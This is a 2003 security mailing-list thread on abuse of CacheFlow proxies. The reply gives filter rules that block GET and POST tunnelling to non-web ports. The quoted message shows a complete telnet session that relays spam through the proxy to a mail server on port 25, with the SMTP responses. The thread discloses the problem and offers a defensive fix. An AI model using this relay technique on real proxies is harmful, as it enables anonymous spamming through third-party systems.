[prev in list] [next in list] [prev in thread] [next in thread]
List: incidents
Subject: Re: Cacheflow proxy abuse (revisited)
From: Tim Kennedy <tim () timkennedy ! net>
Date: 2003-09-12 15:19:44
[Download RAW message or body]
Alain,
If you make sure all 4 of these lines are in your inline filter,
it will block both the GET and POST methods of making outbound
connections on a cacheflow.
--------------------------------------------------------------------------
cacheflow#conf t
cacheflow#(config)inline filter-list local ccc
https://.*:(443|80) service=yes
https://.*:[0-9]+/ service=no
http://.*:(443|80) service=yes
http://.*:[0-9]+/ service=no
ccc
--------------------------------------------------------------------------
Sorry, I left the second two (http) lines out, in my original mail.
I left the log of the original telnet session at the bottom of this
reply. When I add these lines to the cacheflow, and try to GET or
POST to another server, on another port, I get:
--------------------------------------------------------------------------
memnoch[1075]# telnet 10.0.2.190 80
Trying 10.0.2.190...
Connected to 10.0.2.190.
Escape character is '^]'.
POST / HTTP/1.1
HOST: mail.yellowbrix.com:25
HELO .
HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 2678
Content-Type: text/html
Connection: close
--------------------------------------------------------------------------
At least, it worked for me, and people have stopped relaying through
our cacheflow.
-Tim
On Fri, 12 Sep 2003, Alain Fauconnet wrote:
> Hello,
>
> Thanks for the info. That does prevent the CONNECT abuse, but not the
> POST abuse, which can be used almost in the same way (although a bit
> more difficult) to use a Cachelfow to hide one's tracks when spamming.
>
> Greets,
> _Alain_
>
> > --------------------------------------------------------------------------
> > telnet ip.or.hostname.of.cacehflow 80
> > GET / HTTP/1.1
> > HOST: mailserver.victim.com:25
> > HELO .
> > mail from: spammer@alter.net
> > rcpt to: target@unsuspecting.com
> > DATA
> > Subject: Look Ma! I'm an open relay
> > HI, you've been spammed through an open proxy, because of a bug in the
> > OS code. Have a Great Day!
> > -Spammer
> > .
> >
> > 220 mailserver.victim.com ESMTP Sendmail 8.12.9/8.12.9; Wed, 10 Sep 2003
> > 11:15:31 -0400
> > 500 5.5.1 Command unrecognized: "GET / HTTP/1.0"
> > 500 5.5.1 Command unrecognized: "HOST: memnoch.sugarat.net:25"
> > 250 mailserver.victim.com Hello CacheFlowServer@[xxx.x.x.xx], pleased to
> > meet you
> > 250 2.1.0 spammer@alter.net... Sender ok
> > 250 2.1.5 target@unsuspecting.com... Recipient ok
> > 354 Enter mail, end with "." on a line by itself
> > 250 2.0.0 h8AFFVfo011729 Message accepted for delivery
> > 500 5.5.1 Command unrecognized: "Cache-Control: max-stale=0"
> > 500 5.5.1 Command unrecognized: "Connection: Keep-Alive"
> > 500 5.5.1 Command unrecognized: "Client-ip: xx.xx.x.xxx"
> > 500 5.5.1 Command unrecognized: ""
> > ^]
> > telnet> close
> > Connection closed.
> >
> > --------------------------------------------------------------------------
---------------------------------------------------------------------------
Attend Black Hat Briefings & Training Federal, September 29-30 (Training),
October 1-2 (Briefings) in Tysons Corner, VA; the world's premier
technical IT security event. Modeled after the famous Black Hat event in
Las Vegas! 6 tracks, 12 training sessions, top speakers and sponsors.
Symantec is the Diamond sponsor. Early-bird registration ends September 6.Visit us: www.blackhat.com
----------------------------------------------------------------------------
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic